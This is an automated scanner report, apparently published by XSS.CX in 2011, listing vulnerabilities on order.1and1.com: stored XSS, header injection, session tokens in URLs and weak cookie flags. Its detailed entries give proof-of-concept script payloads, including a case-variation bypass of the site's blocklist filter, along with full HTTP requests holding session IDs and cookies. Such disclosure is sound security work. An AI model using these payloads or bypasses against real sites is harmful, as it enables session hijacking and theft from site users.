Stored XSS, Permanent Cross Site Scripting, order.1and1.com, DORK, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'

Report generated by XSS.CX at Sun Mar 20 13:56:02 CDT 2011.


Loading

1. Cross-site scripting (stored)

Stored XSS in order.1and1.com Stored XSS in order.1and1.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86

Stored XSS in order.1and1.com Stored XSS in order.1and1.com, DORK, Stored Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]

1.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]

1.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]

1.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

2. HTTP header injection

2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]

2.5. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]

2.6. http://order.1and1.com/xml/order/Jumpto [page parameter]

2.7. http://order.1and1.com/xml/order/Jumpto [site parameter]

2.8. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]

2.9. http://order.1and1.com/xml/order/domaincheck [__lf parameter]

2.10. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]

2.11. http://order.1and1.com/xml/order/tariffselect [__lf parameter]

2.12. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]

3. Session token in URL

3.1. http://order.1and1.com/links

3.2. http://order.1and1.com/xml/order

3.3. http://order.1and1.com/xml/order/AboutUs

3.4. http://order.1and1.com/xml/order/CloudDynamicServer

3.5. http://order.1and1.com/xml/order/CloudDynamicServer

3.6. http://order.1and1.com/xml/order/Contact

3.7. http://order.1and1.com/xml/order/Domaininfo

3.8. http://order.1and1.com/xml/order/DomaininfoMove

3.9. http://order.1and1.com/xml/order/Eshops

3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

3.15. http://order.1and1.com/xml/order/FeatureControlCenter

3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess

3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql

3.19. http://order.1and1.com/xml/order/FeatureDomainDns

3.20. http://order.1and1.com/xml/order/FeatureDomainDomains

3.21. http://order.1and1.com/xml/order/FeatureDomainPdr

3.22. http://order.1and1.com/xml/order/FeatureDreamweaver

3.23. http://order.1and1.com/xml/order/FeatureEmailEmail

3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan

3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail

3.26. http://order.1and1.com/xml/order/FeatureFtpBackup

3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk

3.33. http://order.1and1.com/xml/order/FeatureParallelsSB

3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate

3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

3.39. http://order.1and1.com/xml/order/FeatureServerFirewall

3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive

3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring

3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

3.43. http://order.1and1.com/xml/order/FeatureServerProcessor

3.44. http://order.1and1.com/xml/order/FeatureServerRecovery

3.45. http://order.1and1.com/xml/order/FeatureServerSsl

3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements

3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap

3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet

3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss

3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint

3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock

3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.68. http://order.1and1.com/xml/order/FirstWebsite

3.69. http://order.1and1.com/xml/order/Gtc

3.70. http://order.1and1.com/xml/order/Home

3.71. http://order.1and1.com/xml/order/Home

3.72. http://order.1and1.com/xml/order/Hosting

3.73. http://order.1and1.com/xml/order/Hosting

3.74. http://order.1and1.com/xml/order/Instant

3.75. http://order.1and1.com/xml/order/International

3.76. http://order.1and1.com/xml/order/Jumpto

3.77. http://order.1and1.com/xml/order/LocalSubmission

3.78. http://order.1and1.com/xml/order/Mail

3.79. http://order.1and1.com/xml/order/Mail

3.80. http://order.1and1.com/xml/order/MailInstantMail

3.81. http://order.1and1.com/xml/order/MailXchange

3.82. http://order.1and1.com/xml/order/MicrosoftExchange

3.83. http://order.1and1.com/xml/order/Moneyback

3.84. http://order.1and1.com/xml/order/MsHosting

3.85. http://order.1and1.com/xml/order/MsHosting

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

3.87. http://order.1and1.com/xml/order/News

3.88. http://order.1and1.com/xml/order/News

3.89. http://order.1and1.com/xml/order/PrivacyPolicy

3.90. http://order.1and1.com/xml/order/Server

3.91. http://order.1and1.com/xml/order/Server

3.92. http://order.1and1.com/xml/order/ServerPremium

3.93. http://order.1and1.com/xml/order/Service

3.94. http://order.1and1.com/xml/order/Sharepoint

3.95. http://order.1and1.com/xml/order/TcSpecialOffers

3.96. http://order.1and1.com/xml/order/TellAFriend

3.97. http://order.1and1.com/xml/order/VirtualServer

3.98. http://order.1and1.com/xml/order/VirtualServer

3.99. http://order.1and1.com/xml/order/VirtualServerL

3.100. http://order.1and1.com/xml/order/VirtualServerL

3.101. http://order.1and1.com/xml/order/VirtualServerXL

3.102. http://order.1and1.com/xml/order/VirtualServerXXL

3.103. http://order.1and1.com/xml/order/a

3.104. http://order.1and1.com/xml/order/addon

3.105. http://order.1and1.com/xml/order/costs

3.106. http://order.1and1.com/xml/order/domaincheck

3.107. http://order.1and1.com/xml/order/domaincheck

3.108. http://order.1and1.com/xml/order/eshopupselling

3.109. http://order.1and1.com/xml/order/eshopupselling

3.110. http://order.1and1.com/xml/order/popupDomainPrices

3.111. http://order.1and1.com/xml/order/popupDomainPrices

3.112. http://order.1and1.com/xml/order/popupGreenPower

3.113. http://order.1and1.com/xml/order/popupPayPalInfo

3.114. http://order.1and1.com/xml/order/popupServerOsCds

3.115. http://order.1and1.com/xml/order/popupServerOsVps

3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords

3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine

3.118. http://order.1and1.com/xml/order/sitedesign

3.119. http://order.1and1.com/xml/order/tariffselect

3.120. http://order.1and1.com/xml/webservice/VDSPriceService

4. Cross-domain Referer leakage

4.1. http://order.1and1.com/xml/order/CloudDynamicServer

4.2. http://order.1and1.com/xml/order/Eshops

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap

4.4. http://order.1and1.com/xml/order/Home

4.5. http://order.1and1.com/xml/order/Hosting

4.6. http://order.1and1.com/xml/order/Instant

4.7. http://order.1and1.com/xml/order/LocalSubmission

4.8. http://order.1and1.com/xml/order/Mail

4.9. http://order.1and1.com/xml/order/MailInstantMail

4.10. http://order.1and1.com/xml/order/MailXchange

4.11. http://order.1and1.com/xml/order/MicrosoftExchange

4.12. http://order.1and1.com/xml/order/MsHosting

4.13. http://order.1and1.com/xml/order/Server

4.14. http://order.1and1.com/xml/order/ServerPremium

4.15. http://order.1and1.com/xml/order/Sharepoint

4.16. http://order.1and1.com/xml/order/VirtualServer

4.17. http://order.1and1.com/xml/order/VirtualServerL

4.18. http://order.1and1.com/xml/order/eshopupselling

5. Cookie without HttpOnly flag set

5.1. http://order.1and1.com/xml/order

5.2. http://order.1and1.com/xml/order

5.3. http://order.1and1.com/xml/order/AboutUs

5.4. http://order.1and1.com/xml/order/AboutUs

5.5. http://order.1and1.com/xml/order/CloudDynamicServer

5.6. http://order.1and1.com/xml/order/CloudDynamicServer

5.7. http://order.1and1.com/xml/order/Contact

5.8. http://order.1and1.com/xml/order/Domaininfo

5.9. http://order.1and1.com/xml/order/Domaininfo

5.10. http://order.1and1.com/xml/order/DomaininfoMove

5.11. http://order.1and1.com/xml/order/DomaininfoMove

5.12. http://order.1and1.com/xml/order/Eshops

5.13. http://order.1and1.com/xml/order/Eshops

5.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.15. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.16. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.17. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.18. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.19. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.20. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.21. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.22. http://order.1and1.com/xml/order/FeatureControlCenter

5.23. http://order.1and1.com/xml/order/FeatureControlCenter

5.24. http://order.1and1.com/xml/order/FeatureDatabaseAccess

5.25. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.26. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.27. http://order.1and1.com/xml/order/FeatureDatabaseMssql

5.28. http://order.1and1.com/xml/order/FeatureDomainDns

5.29. http://order.1and1.com/xml/order/FeatureDomainDns

5.30. http://order.1and1.com/xml/order/FeatureDomainDomains

5.31. http://order.1and1.com/xml/order/FeatureDomainDomains

5.32. http://order.1and1.com/xml/order/FeatureDomainPdr

5.33. http://order.1and1.com/xml/order/FeatureDomainPdr

5.34. http://order.1and1.com/xml/order/FeatureDreamweaver

5.35. http://order.1and1.com/xml/order/FeatureDreamweaver

5.36. http://order.1and1.com/xml/order/FeatureEmailEmail

5.37. http://order.1and1.com/xml/order/FeatureEmailEmail

5.38. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.39. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.40. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.41. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.42. http://order.1and1.com/xml/order/FeatureFtpBackup

5.43. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.44. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.45. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.46. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.47. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.48. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.49. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.50. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.51. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.52. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.53. http://order.1and1.com/xml/order/FeatureParallelsPlesk

5.54. http://order.1and1.com/xml/order/FeatureParallelsSB

5.55. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.56. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.57. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

5.58. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

5.59. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

5.60. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

5.61. http://order.1and1.com/xml/order/FeatureServerFirewall

5.62. http://order.1and1.com/xml/order/FeatureServerHarddrive

5.63. http://order.1and1.com/xml/order/FeatureServerMonitoring

5.64. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

5.65. http://order.1and1.com/xml/order/FeatureServerProcessor

5.66. http://order.1and1.com/xml/order/FeatureServerRecovery

5.67. http://order.1and1.com/xml/order/FeatureServerSsl

5.68. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

5.69. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

5.70. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

5.71. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.72. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.73. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.74. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.75. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.76. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.77. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.78. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.79. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.80. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.81. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.82. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.83. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.84. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.85. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.86. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.87. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.88. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.89. http://order.1and1.com/xml/order/FeatureSite-buildingNet

5.90. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.91. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.92. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.95. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.96. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.97. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.98. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.99. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.100. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.101. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.102. http://order.1and1.com/xml/order/FirstWebsite

5.103. http://order.1and1.com/xml/order/FirstWebsite

5.104. http://order.1and1.com/xml/order/Gtc

5.105. http://order.1and1.com/xml/order/Gtc

5.106. http://order.1and1.com/xml/order/Home

5.107. http://order.1and1.com/xml/order/Home

5.108. http://order.1and1.com/xml/order/Hosting

5.109. http://order.1and1.com/xml/order/Hosting

5.110. http://order.1and1.com/xml/order/Instant

5.111. http://order.1and1.com/xml/order/Instant

5.112. http://order.1and1.com/xml/order/International

5.113. http://order.1and1.com/xml/order/International

5.114. http://order.1and1.com/xml/order/Jumpto

5.115. http://order.1and1.com/xml/order/Jumpto

5.116. http://order.1and1.com/xml/order/LocalSubmission

5.117. http://order.1and1.com/xml/order/LocalSubmission

5.118. http://order.1and1.com/xml/order/Mail

5.119. http://order.1and1.com/xml/order/Mail

5.120. http://order.1and1.com/xml/order/MailInstantMail

5.121. http://order.1and1.com/xml/order/MailInstantMail

5.122. http://order.1and1.com/xml/order/MailXchange

5.123. http://order.1and1.com/xml/order/MailXchange

5.124. http://order.1and1.com/xml/order/MicrosoftExchange

5.125. http://order.1and1.com/xml/order/MicrosoftExchange

5.126. http://order.1and1.com/xml/order/Moneyback

5.127. http://order.1and1.com/xml/order/Moneyback

5.128. http://order.1and1.com/xml/order/MsHosting

5.129. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

5.130. http://order.1and1.com/xml/order/Mshosting

5.131. http://order.1and1.com/xml/order/News

5.132. http://order.1and1.com/xml/order/News

5.133. http://order.1and1.com/xml/order/PrivacyPolicy

5.134. http://order.1and1.com/xml/order/PrivacyPolicy

5.135. http://order.1and1.com/xml/order/Server

5.136. http://order.1and1.com/xml/order/Server

5.137. http://order.1and1.com/xml/order/ServerPremium

5.138. http://order.1and1.com/xml/order/ServerPremium

5.139. http://order.1and1.com/xml/order/Service

5.140. http://order.1and1.com/xml/order/Service

5.141. http://order.1and1.com/xml/order/Sharepoint

5.142. http://order.1and1.com/xml/order/Sharepoint

5.143. http://order.1and1.com/xml/order/TcSpecialOffers

5.144. http://order.1and1.com/xml/order/TcSpecialOffers

5.145. http://order.1and1.com/xml/order/TellAFriend

5.146. http://order.1and1.com/xml/order/TellAFriend

5.147. http://order.1and1.com/xml/order/VirtualServer

5.148. http://order.1and1.com/xml/order/VirtualServer

5.149. http://order.1and1.com/xml/order/VirtualServerL

5.150. http://order.1and1.com/xml/order/VirtualServerL

5.151. http://order.1and1.com/xml/order/VirtualServerXL

5.152. http://order.1and1.com/xml/order/VirtualServerXXL

5.153. http://order.1and1.com/xml/order/a

5.154. http://order.1and1.com/xml/order/addon

5.155. http://order.1and1.com/xml/order/costs

5.156. http://order.1and1.com/xml/order/domaincheck

5.157. http://order.1and1.com/xml/order/domaincheck

5.158. http://order.1and1.com/xml/order/eshopupselling

5.159. http://order.1and1.com/xml/order/eshopupselling

5.160. http://order.1and1.com/xml/order/popupDomainPrices

5.161. http://order.1and1.com/xml/order/popupDomainPrices

5.162. http://order.1and1.com/xml/order/popupGreenPower

5.163. http://order.1and1.com/xml/order/popupGreenPower

5.164. http://order.1and1.com/xml/order/popupPayPalInfo

5.165. http://order.1and1.com/xml/order/popupServerOsCds

5.166. http://order.1and1.com/xml/order/popupServerOsVps

5.167. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.168. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.169. http://order.1and1.com/xml/order/popupWebsiteMagazine

5.170. http://order.1and1.com/xml/order/sitedesign

5.171. http://order.1and1.com/xml/order/tariffselect

5.172. http://order.1and1.com/xml/order/tariffselect

6. Email addresses disclosed

6.1. http://order.1and1.com/xml/order/FeatureDomainPdr

6.2. http://order.1and1.com/xml/order/International

6.3. http://order.1and1.com/xml/order/Mail

6.4. http://order.1and1.com/xml/order/MailXchange

6.5. http://order.1and1.com/xml/order/PrivacyPolicy

7. Content type incorrectly stated



1. Cross-site scripting (stored)  next
There are 26 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/CloudDynamicServerbe5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyEhIB4cNTg=; Expires=Fri, 07-Apr-2079 21:08:22 GMT; Path=/
ETag: dafe46acb36a9f556844954eae96d32c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63338


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
pfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="CloudDynamicServer";UNOUNO.params.lastpage="CloudDynamicServerbe5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

